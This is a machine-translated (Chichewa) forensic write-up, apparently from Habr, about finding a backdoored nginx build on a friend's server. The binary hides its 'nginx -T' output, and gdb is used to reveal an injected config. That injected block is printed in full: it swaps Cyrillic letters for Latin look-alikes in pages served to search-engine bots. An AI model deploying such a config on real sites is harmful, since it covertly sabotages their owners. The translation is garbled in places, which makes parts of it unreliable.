Nkhani yosasangalatsa inachitika kwa mnzanga wina. Koma ngakhale zinali zosasangalatsa kwa Mikhail, zinalinso zosangalatsa kwa ine.
Ndiyenera kunena kuti bwenzi langa liri bwino Ubix-user: akhoza kukhazikitsa yekha dongosolo MySQL, Php ndi kupanga zoikamo zosavuta nginx.
Ndipo ali ndi mawebusayiti khumi ndi awiri kapena amodzi ndi theka operekedwa ku zida zomangira.
Imodzi mwamasamba operekedwa ku ma chainsaws imakhala molimba mu TOP ya injini zosakira. Tsambali silimawunikiranso zamalonda, koma wina adazolowera kuwuukira. Kuti DDoS, ndiye kuti mwankhanza, ndiye amalemba ndemanga zotukwana ndikutumiza zonyoza kwa omwe akukhala nawo komanso ku RKN.
Mwadzidzidzi, zonse zidakhazikika ndipo bata ili silinakhale labwino, ndipo tsambalo lidayamba kusiya pang'onopang'ono mizere yapamwamba yazosaka.
Awa anali mawu, ndiye nkhani ya admin yokha.
Nthawi yogona inali itatsala pang'ono kugona pomwe foni inalira: "San, suyang'ana seva yanga? Zikuwoneka kwa ine kuti ndinabedwa, sindingathe kutsimikizira, koma kumverera sikunandisiye kwa sabata lachitatu. Mwina yakwana nthawi yoti ndilandire chithandizo cha paranoia?"
Chomwe chinatsatira chinali kukambirana kwa theka la ola komwe kungafotokozedwe mwachidule motere:
- nthaka yobera inali yachonde ndithu;
- wowukira atha kupeza ufulu wogwiritsa ntchito kwambiri;
- chiwonongeko (ngati chinachitika) chinalunjika pa tsamba ili;
- madera ovuta akonzedwa ndipo muyenera kumvetsetsa ngati panali malowedwe aliwonse;
- kuthyolako sikungakhudze nambala yatsamba ndi nkhokwe.
Ponena za mfundo yotsiriza.
Ndi IP yokha yakutsogolo yoyera yomwe imayang'ana padziko lonse lapansi. Palibe kusinthanitsa pakati pa backends ndi frontend kupatula http (s), ogwiritsa / achinsinsi ndi osiyana, palibe makiyi anasinthanitsa. Pa ma adilesi imvi, madoko onse kupatula 80/443 amatsekedwa. White backend IPs amadziwika kwa ogwiritsa ntchito awiri okha, omwe Mikhail amawakhulupirira kwathunthu.
Aikidwa pa frontend Debian 9 ndipo pofika nthawi yoyimbayimba, dongosololi limasiyanitsidwa ndi dziko lapansi ndi firewall yakunja ndikuyimitsidwa.
"Ok, ndipatseni mwayi," ndinaganiza zosiya kugona kwa ola limodzi. "Ndiziwona ndi maso anga."
Apa ndi zina:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Kuyang'ana chotheka kuthyolako
Ndimayambitsa seva, poyamba njira yopulumutsira. Ndimayika ma disks ndikuwongolera zoona-mitengo, m'mbiri, zipika zamakina, ndi zina zotero, ngati n'kotheka, ndimayang'ana masiku a kulengedwa kwa mafayilo, ngakhale ndikumvetsa kuti wosuta wamba akanatha "kusesa" pambuyo pake, ndipo Misha "adaponda" kale pamene ankadzifunafuna yekha. .
Ndimayamba mwachizolowezi, osamvetsetsa zomwe ndiyenera kuyang'ana, ndimaphunzira ma configs. Choyamba, ndili ndi chidwi nginx popeza, ambiri, palibe china chilichonse pa frontend kupatula izo.
Ma configs ndi ang'onoang'ono, opangidwa bwino kukhala mafayilo khumi ndi awiri, ndimangowayang'ana mphaka'oh mmodzi ndi mmodzi. Chilichonse chikuwoneka choyera, koma simudziwa ngati ndaphonyapo kanthu onjezerani, ndiroleni ndilembe zonse:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Sindinamvetsetse: "Mndandanda uli kuti?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Funso lachiwiri likuwonjezedwa pafunso lamndandanda: "Chifukwa chiyani mtundu wakale wa nginx?"
Kuphatikiza apo, dongosololi limakhulupirira kuti mtundu waposachedwa wakhazikitsidwa:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
Ndikuyitana:
- Misha, chifukwa chiyani mudasonkhananso nginx?
- Dikirani, sindikudziwa momwe ndingachitire izi!
- Chabwino, pita ukagone ...
Nginx imamangidwanso momveka bwino ndipo zotsatira za ndandanda pogwiritsa ntchito "-T" zimabisika pazifukwa. Palibenso zokayikitsa za kubera ndipo mutha kungovomereza ndipo (popeza Misha adalowa m'malo mwa seva ndi yatsopano) lingalirani vutolo.
Ndipo ndithudi, popeza wina adalandira ufulu muzu'Aa, ndiye zomveka kuchita kukhazikitsanso dongosolo, ndipo kunalibe ntchito kuyang'ana chomwe chinali cholakwika pamenepo, koma nthawi ino chidwi chidagonjetsa tulo. Kodi tingadziwe bwanji zimene ankafuna kutibisira?
Tiyeni tiyese kufufuza:
$ strace nginx -T
Tikuyang'ana, pali mizere yokwanira yosakwanira mu trace a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Kuti tisangalale, tiyeni tifanizire zomwe tapeza.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Ndikuganiza gawo la code /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
adabweretsedwa ku fomu:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
kapena
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
chifukwa chake mindandanda ya "-T" sikuwonetsedwa.
Koma tingawone bwanji config?
Ngati lingaliro langa lili lolondola ndipo vuto limangosintha ngx_dump_config tiyeni tiyese kukhazikitsa ntchito gdb, mwamwayi pali kiyi --ndi-cc-opt -g perekani ndikuyembekeza kuti kukhathamiritsa -O2 sizidzatipweteka. Pa nthawi yomweyo, popeza sindikudziwa bwanji ngx_dump_config akhoza kukonzedwa mkati nkhani 'T':, sitiyitcha chipikachi, koma chiyikeni pogwiritsa ntchito nkhani 't':
Chifukwa chiyani mungagwiritse ntchito '-t' komanso '-T'Block Processing ngati(ngx_dump_config) zimachitika mkati ngati (ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Inde, ngati kachidindo kasinthidwa mu gawo ili osati mkati nkhani 'T':, ndiye njira yanga sigwira.
Yesani nginx.confAtathetsa kale vutoli moyesera, zidakhazikitsidwa kuti kusinthika kochepa kumafunikira kuti pulogalamu yaumbanda igwire ntchito. nginx mtundu:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Tidzagwiritsa ntchito mwachidule m'nkhaniyi.
Yambitsani debugger
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Pang'onopang'ono:
- kukhazikitsa breakpoint mu ntchito chachikulu ()
- yambitsani pulogalamuyo
- sinthani mtengo wa kusintha komwe kumatsimikizira zotsatira za config ngx_dump_config=1
- pitilizani/kumaliza pulogalamuyo
Monga tikuwonera, masinthidwe enieni amasiyana ndi athu, timasankha chidutswa cha parasitic kuchokera pamenepo:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Tiyeni tiwone zomwe zikuchitika pano mwadongosolo.
Ndatsimikiza Wogwiritsa Ntchito's yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Masamba a ntchito saphatikizidwa WordPress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Ndi kwa amene akugwa pansi pazifukwa ziwirizi
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
m'malemba HTML-masamba amasintha 'O' pa 'o' и 'A' pa 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Ndiko kulondola, chinyengo chokha ndi chimenecho 'a'!='a' monga 'o'!='o':
Chifukwa chake, ma injini osakira amalandira, m'malo mwa zilembo za 100% za Cyrillic, zinyalala zosinthidwa zosinthidwa ndi Chilatini. 'a' и 'o'. Sindingayerekeze kukambirana momwe izi zimakhudzira SEO, koma ndizokayikitsa kuti kuphatikizika kwamakalata koteroko kungakhale ndi zotsatira zabwino pazotsatira zakusaka.
Ndinganene chiyani, anyamata ndimalingaliro.
powatsimikizira
Source: www.habr.com